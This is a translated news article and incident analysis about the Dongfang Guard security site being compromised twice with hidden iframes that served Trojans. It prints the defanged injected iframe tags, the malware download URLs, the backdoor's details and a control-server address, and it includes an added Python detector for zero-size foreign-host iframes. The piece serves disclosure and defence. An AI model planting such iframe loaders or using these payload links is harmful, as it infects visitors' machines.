Who can ensure the security of the website?

Source: Internet
Author: User
Tags: reflector

Editor's note: for security reasons, "http" is replaced with "hxxp", and "<>" is replaced with "[]".

Two days ago, netizens reported that Dongfang Guard, a well-known security website in China, was once again found serving a Trojan. This is the second time that Dongfang Guard has exposed its users to a security risk.

Review

Before that, a malicious code reference had already been found on the home page of the Dongfang Guard website (hxxp://www.i110.com). A user who had not installed Microsoft's MS07-004 patch and opened that page in IE was infected with the Trojan.

Technical analysis:

1. The home page code of the Dongfang Guard website contained a reference to a malicious web page:

    [iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

Figure 1

2. The referenced malicious web page contains code that exploits the MS07-004 vulnerability, which causes the system to silently download hxxp://***.ch/xia.exe (Trojan-Downloader.Win32.Agent.ddz) to the local machine and run it.

3. Once run, xia.exe downloads the Gray Pigeon virus from hxxp://***.li/2.exe (a Backdoor.Win32.Hupigon variant).

4. 2.exe is the latest variant of the Gray Pigeon virus. It uses rootkit techniques to hide its process. When run, it drops a copy to %WinDir%\svchost.exe (381440 bytes) and creates the following service:

    Service name: Net work nois
    Service description: Net work nois
    Service program: C:\WINNT\svchost.exe

In addition, hxxp://lxn2wyf8899.3322.org/ip.txt is downloaded to the system directory of the infected machine. ip.txt contains the following:

    hxxp://221.215.170.192:5600/wwwroot/ (the IP address is located in Licang District, Qingdao, Shandong; Netcom ADSL)

Infected computers are remotely controlled by the attacker, who can perform arbitrary file and registry operations, keylogging, download and execution of remote programs, arbitrary network operations, and even remote webcam monitoring.

Trojan again

This time, viewing the source of the Dongfang Guard home page shows an inserted "[iframe src=" tag. It silently opens a new page that is disguised as a browser "page cannot be displayed" error, while loading three hidden pages in the background that download Trojans.

Hidden Page code:

    [iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0 height=0 frameborder=0][/iframe]

On the forged error page, three webpages are opened:

    [iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0" height="0" frameborder="0"][/iframe]
    [iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"][/iframe]
    [iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"][/iframe]
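Both incidents described above rely on the same pattern: a zero-size iframe injected into a legitimate page that loads content from a foreign host. The following detection script is an added example, not code from the original article or from Dongfang Guard; it scans page HTML for that pattern. The sample HTML is constructed here and reuses the masked "www.****.cn" host names from the write-up, and "www.i110.com" is taken as the site's own host.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of an injected home page (not the real site's source).
# The first frame is ordinary page layout; the other two match the injection
# described in the article: zero size, foreign host.
SAMPLE_HTML = """
<html><body>
<h1>Welcome</h1>
<iframe src="hxxp://www.i110.com/news/index.htm" width="600" height="400"></iframe>
<iframe src="hxxp://www.****.cn/33/Reflector/index.htm" width=0 height=0 frameborder=0></iframe>
<iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"></iframe>
</body></html>
"""

class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag together with its attributes."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def is_zero_size(attrs):
    """True when width or height is 0 (with or without a px suffix)."""
    for key in ("width", "height"):
        value = attrs.get(key, "").strip().lower().rstrip("px").strip()
        if value == "0":
            return True
    return False

def find_hidden_iframes(html, page_host):
    """Return the src of every zero-size iframe that loads from a host other than page_host."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).netloc.lower()
        # A zero-size frame pulling a foreign host is the hidden-loader shape;
        # normal-size frames and same-host frames are left alone here.
        if is_zero_size(attrs) and host and host != page_host.lower():
            findings.append(src)
    return findings

if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_HTML, "www.i110.com"):
        print("suspicious hidden iframe:", src)
```

Run against a site's own saved home page on a schedule, a non-empty result is a cheap early warning that the page source has been altered.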

Trojans downloaded:

    hxxp://www.*****.cn/33/Reflector/1.exe (link no longer valid)
    hxxp://www.******.com/0.exe

Figure 2

Figure 3

Will there be a third and a fourth time?

As the saying goes, "once or twice may be forgiven, but not a third and a fourth time." As front-line defenders, security websites enjoy a high level of credibility and influence among users, so any negligence on their part does far more harm than the Trojan itself. After the first incident, I believe Dongfang Guard took appropriate measures. That the Trojan incident could nonetheless happen again calls for vigilance and reflection.

A repeat means that in the contest between the "spear" and the "shield", the spear has prevailed once again. Beyond system vulnerabilities that have not yet been discovered, the site's own security monitoring evidently also has gaps that can be exploited.

In a previous article we noted that CNN, having failed to update its anti-virus software promptly, was hit by a worm that could have been detected in time. The spear and the shield always coexist; neither can completely cover the other, and they either coexist or disappear together. In other words, the second Trojan incident is due not only to the emergence of a new spear but also to the earlier flaw in the shield, which gave the spear its opening.

A problem occurring is not in itself terrible. What is to be feared is not knowing how the problem occurred, and not knowing how to prevent it from happening again.

A security website represents not only a company or a group but also the front line of the network security struggle. When it cannot guarantee its own security, it leaves ordinary users facing an increasingly dangerous online world and wondering who else can help them resist network threats.

When even a security website is knocked down, who else can we trust? Who can ensure the security of websites?

Related Materials

MS07-004 vulnerability: the Vector Markup Language (VML) implementation shipped with multiple versions of Microsoft's operating systems contains an integer overflow that allows remote attackers to execute arbitrary code and take control of the user's machine.

Dongfang Guard: Jiaotong Mingtai Information Security Company, a well-known information security vendor in China. The company provides anti-virus products, data protection, anti-virus gateway products, anti-spam products, network equipment, system integration and OEM customization services.
